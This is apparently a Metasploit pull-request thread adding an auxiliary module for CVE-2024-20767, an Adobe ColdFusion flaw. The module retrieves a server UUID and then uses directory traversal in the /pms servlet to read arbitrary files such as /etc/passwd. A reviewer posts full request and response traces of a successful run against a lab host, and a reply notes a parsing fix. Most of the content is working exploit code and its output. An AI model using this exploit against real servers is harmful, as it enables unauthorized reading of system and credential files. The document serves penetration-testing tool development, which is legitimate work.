modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb

```diff
@@ -0,0 +1,114 @@
+          ['CVE', '2024-20767'],
+          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],
+          ['URL', 'https://jeva.cc/2973.html'],
+
+        ],
+        'DisclosureDate' => '2024-03-12',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
+        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
+        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
+        OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
+      ]
+    )
+  end
+
+  def get_uuid
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
+      'vars_get' =>
+       {
+         'method' => 'getHeartBeat'
+       }
+    })
+    fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res
+
+    # TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.
+    fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200
+    uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text
+    fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
+    uuid
+  end
+
+  def run
+    print_status('Attempting to retrieve UUID ...')
+    uuid = get_uuid
+    print_good("UUID found: #{uuid}")
+    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}")
+
+    traversal_path = '../' * datastore['DEPTH']
+    file_path = "#{traversal_path}#{datastore['FILE_NAME']}"
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'pms'),
+      'vars_get' =>
+         {
+           'module' => 'logging',
+           'file_name' => file_path,
+           'number_of_lines' => datastore['NUMBER_OF_LINES']
+         },
+      'headers' =>
+         {
+           'uuid' => uuid
+         }
+    })
+
+    fail_with(Failure::Unknown, 'No response received') unless res
+
+    if res.code == 200
+      print_good('File content received:')
+    else
+      fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
+    end
+
+    # TODO: Once we have a better idea of the formatting the file is returned in edit this loop to trim the fat.
+    # TODO  From the screenshot in the write up it looks like it returns an array where the first element is null and
+    # TODO  the file contents are listed after that but each line is prefixed with a "_"
```

Comment:
It seems to work with version 2023.0.0.330468 on Linux and this is the output I got:
```
msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run verbose=true rhosts=192.168.101.230 rport=8500 httptrace=true
[*] Running module against 192.168.101.230

[*] Attempting to retrieve UUID ...
####################
# Request:
####################
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: 192.168.101.230:8500
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1


####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Date: Thu, 02 May 2024 10:26:18 GMT

<wddxPacket version='1.0'><header/><data><struct><var name='started_at'><number>1.71464426831E12</number></var><var name='monitoring_enabled'><boolean value='false'/></var><var name='es_port'><number>0.0</number></var><var name='port'><string>8500</string></var><var name='host'><string>192.168.101.230</string></var><var name='j2ee'><boolean value='false'/></var><var name='traking_enabled'><boolean value='false'/></var><var name='time_stamp'><number>1.71464557857E12</number></var><var name='display_name'><string></string></var><var name='instance_id'><string>192.168.101.230:cfusion:8500</string></var><var name='group_id'><null/></var><var name='name'><string>cfusion</string></var><var name='group_name'><null/></var><var name='jdk'><string>oracle</string></var><var name='https_enabled'><boolean value='false'/></var><var name='es_host'><string></string></var><var name='version'><number>1.0</number></var><var name='cluster_id'><null/></var><var name='uuid'><string>4c8c8f6a-198c-47fd-ba51-97a6aba6790c</string></var></struct></data></wddxPacket>
[+] UUID found: 4c8c8f6a-198c-47fd-ba51-97a6aba6790c
[*] Attempting to exploit directory traversal to read /etc/passwd
####################
# Request:
####################
GET /pms?module=logging&file_name=../../../../..//etc/passwd&number_of_lines=10000 HTTP/1.1
Host: 192.168.101.230:8500
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1
uuid: 4c8c8f6a-198c-47fd-ba51-97a6aba6790c


####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 1481
Date: Thu, 02 May 2024 10:26:18 GMT

[n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash, hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false, pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin, colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin, nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin, speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false, whoopsie:x:117:124::/nonexistent:/bin/false, cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin, kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin, usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin, tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin, uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin, _apt:x:105:65534::/nonexistent:/usr/sbin/nologin, systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin, systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin, nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin, irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin, backup:x:34:34:backup:/var/backups:/usr/sbin/nologin, proxy:x:13:13:proxy:/bin:/usr/sbin/nologin, news:x:9:9:news:/var/spool/news:/usr/sbin/nologin, lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin, games:x:5:60:games:/usr/games:/usr/sbin/nologin, sys:x:3:3:sys:/dev:/usr/sbin/nologin, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin]
[+] File content received:
[*] [n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash, hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false, pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin, colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin, nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin, speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false, whoopsie:x:117:124::/nonexistent:/bin/false, cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin, kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin, usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin, tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin, uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin, _apt:x:105:65534::/nonexistent:/usr/sbin/nologin, systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin, systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin, nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin, irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin, backup:x:34:34:backup:/var/backups:/usr/sbin/nologin, proxy:x:13:13:proxy:/bin:/usr/sbin/nologin, news:x:9:9:news:/var/spool/news:/usr/sbin/nologin, lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin, games:x:5:60:games:/usr/games:/usr/sbin/nologin, sys:x:3:3:sys:/dev:/usr/sbin/nologin, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin]
[+] Results saved to: /home/msfuser/.msf4/loot/20240502122618_default_192.168.101.230_coldfusion.file_974829.txt
[*] Auxiliary module execution completed
```

Reply:
Thanks for posting that output @cdelafuente-r7! I've updated the parsing logic in [e3d7dce](https://github.com/rapid7/metasploit-framework/pull/19050/commits/e3d7dce4a9fad43bfd1ba68b7ab62869e0989c6c)